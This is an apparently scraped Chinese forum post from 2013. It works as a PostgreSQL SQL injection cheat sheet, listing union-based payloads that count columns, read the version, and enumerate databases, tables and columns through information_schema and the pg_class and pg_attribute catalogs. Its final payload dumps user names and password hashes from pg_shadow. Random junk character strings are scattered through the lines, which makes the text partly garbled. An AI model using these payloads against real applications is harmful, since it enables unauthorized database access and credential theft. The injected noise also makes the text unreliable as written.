结合了MSSQL MySQL Oracle的一些特点% I2 G+ g0 A/ f
支持多语句执行,语句可以没有from postgres用户是超级用户(创始人账户) 只有superuser有copy权限 注释: — , /**/
: ]7 h& e8 Y( o$ h1 I连接符: %20 , + , /**/ 内置函数:
7 z, U1 E8 {/ X5 ocurrent_database() //当前数据库名
7 i5 }0 i2 b' ?, E* v- B& \session_user //会话用户
1 e/ Z3 |4 R9 X# q% Kcurrent_user //当前数据库用户: I7 L+ m# o' W
user //当前用户
' a8 f" P: _# V9 eversion() //数据库版本 Union注射:! R/ A( E! a |& r9 k; b2 C
order by n–) b( u [* F! j# ?5 X
and 1=2 union select null,null,null–
9 f! T3 [0 e4 E" x6 qand 1=2 union select ‘beach’,null,null–6 C3 Y$ l$ `: b: h
and 1=2 union select (select version()),null,null– 获取表名,字段名(新版本利用information_schema):4 Z2 t2 K: l4 m/ F
group_concat(table_name) `* J1 E, Z+ l
and 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n–+ H1 L' L' B8 }
and 1=2 union select column_name,null,null from information_schema.columns where table_name=’admin’ limit 1 offset n–0 ~$ f- @0 W/ E! |1 N& m& }
(老版本)+ q$ [( w. h: X1 _$ p* q+ `7 {
pg_class.oid对应pg_attribute.attrelid }+ T. J8 i. |
pg_class.relname表名. X4 \7 D- U9 M8 O& |9 H2 d
pg_attribute.attname字段名 select relname from pg_class获取表名
; u+ A4 {1 z7 _9 j2 B/ c+ [select oid from pg_class where 条件 获取参数, ~0 \& Z2 v' H3 w: P
select attname from pg_attribute where attrelid=’oid的值’ 获取字段名 实战:5 A) n6 n* Y! o5 X0 D9 z
and 1=2 union select relname,null,null from pg_class where relkind=’r’ limit 1 offset 0–加入relkind=’r'只查询普通表
+ ]7 z V3 \2 `and 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind=’r’ limit 1 offset 0–/ w. e) K& J; a+ a( H
由于oid类型是oid,要数据类型兼容我们用cast函数强制转换成varchar类型。比如得到1136 and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0–爆表名
3 A- x, Y* l* m1 U====================================================================== w! i- f6 n% P' K, D
and 1=2 union select datname,null,null from pg_database limit 1 offset 0–爆库 b! l7 {) s: p
and 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0–爆数据库用户密码 | 
抢楼
发表于 2013-10-13 12:57:16
收藏
分享
支持
反对